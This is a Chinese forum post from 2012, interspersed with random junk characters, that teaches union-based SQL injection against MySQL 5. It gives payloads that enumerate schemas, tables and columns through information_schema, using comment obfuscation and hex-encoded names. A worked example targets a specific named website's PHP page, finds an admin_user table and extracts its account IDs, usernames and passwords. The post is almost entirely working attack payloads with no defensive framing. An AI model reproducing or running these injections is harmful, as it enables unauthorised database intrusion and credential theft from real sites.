查库5 Z& x$ P* z* F) E4 C% R a2 v
6 H6 M- Q$ n8 |7 s: P5 `6 n+ _$ mid=-1 union select 1,..,SCHEMA_NAME,n from/**/information_schema.SCHEMATA limit 1,1/*' H8 |- h/ x& k6 @8 K- f" g
+ U' s* b. H7 N! D, P" j
查表2 U1 O) | E& Y$ E- r
9 `7 _: I0 F7 @( Yid=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=库的HEX值/**/limit/**/1,1, _ w8 H- N/ J2 p9 t; A9 p
3 \9 v2 i* A' n' d$ j9 |
查段0 u* }: j' E3 S
I7 N% N& c5 m! P# O1 A6 J( d
id=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=表的HEX值/**/limit/**/1,19 f: \8 ~7 X( x1 g
1 E; p+ @8 g# Q
* z) u/ }- V. t, J
mysql5高级注入方法暴表
6 E: ?( A% R3 i- }5 s+ Q6 ^, }& w A
例子如下:& p' L" T/ T) }7 Z' h7 E% s
, F6 `" p$ s6 N0 N% K" m1.爆表
; f. Q$ F+ b4 H( ^3 s1 V9 Jhttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/* (0x79645F7465616D6E6574为数据库名的16进制转换yd_teamnet)" e6 X) A+ d1 q# @0 d3 N2 p) f
这样爆到第4个时出现了admin_user表。
3 T7 i& m/ x6 H
8 V% t6 d2 j; j6 h. K7 f2.暴字段5 d( F% c) w, ?8 [$ H3 Y1 ~* ^
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*
+ y! O3 ?. l. v, S, `2 o: N K! l6 n# L3 O
4 l' c" d0 R7 s2 R7 ^9 {, P
3.爆密码
: `* l5 q" \8 O0 ^3 s: n! b0 Ehttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/* + z1 l: Y$ Q' p/ O( q# l B5 t
# K% o- { D2 c" r) O& i& @6 T" G' O9 u
|
发表于 2012-9-13 16:29:37
收藏
支持
反对